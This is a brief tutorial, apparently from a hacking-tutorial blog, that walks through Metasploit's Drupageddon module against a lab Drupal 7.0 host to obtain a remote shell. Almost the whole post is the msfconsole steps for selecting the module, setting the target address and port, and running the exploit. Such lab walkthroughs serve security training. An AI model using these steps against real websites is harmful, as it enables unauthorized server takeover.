This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32).
Exploit Targets
Drupal 7.0
Requirement
Attacker: kali Linux
Victim PC: Drupal 7.0
Open Kali terminal type msfconsole
Now type use exploit/multi/http/drupal_drupageddon
msf exploit (drupal_drupageddon)>set targeturi /drupal/
msf exploit (drupal_drupageddon)>set rhost 192.168.0.109 (IP of Remote Host)
msf exploit (drupal_drupageddon)>set rport 80
msf exploit (drupal_drupageddon)>exploit
The post Hack Drupal Website Server using Drupal HTTP Parameter Key/Value SQL Injection appeared first on Hacking Articles.